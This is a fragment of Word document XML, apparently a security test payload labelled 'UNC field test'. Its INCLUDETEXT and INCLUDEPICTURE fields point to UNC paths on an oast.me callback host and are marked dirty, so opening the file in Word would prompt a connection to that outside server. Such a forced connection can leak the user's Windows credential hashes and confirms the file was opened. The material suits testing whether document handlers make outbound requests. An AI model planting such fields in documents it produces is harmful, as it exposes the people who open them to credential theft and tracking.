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UNC field test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin" w:dirty="true"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDETEXT "\\unc.d9vh6w.oast.me\share\text.txt" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>MSOBB-UNC-INCLUDETEXT-NOT-UPDATED</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin" w:dirty="true"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "\\pic.d9vh6w.oast.me\share\image.png" \d </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>MSOBB-UNC-INCLUDEPICTURE-NOT-UPDATED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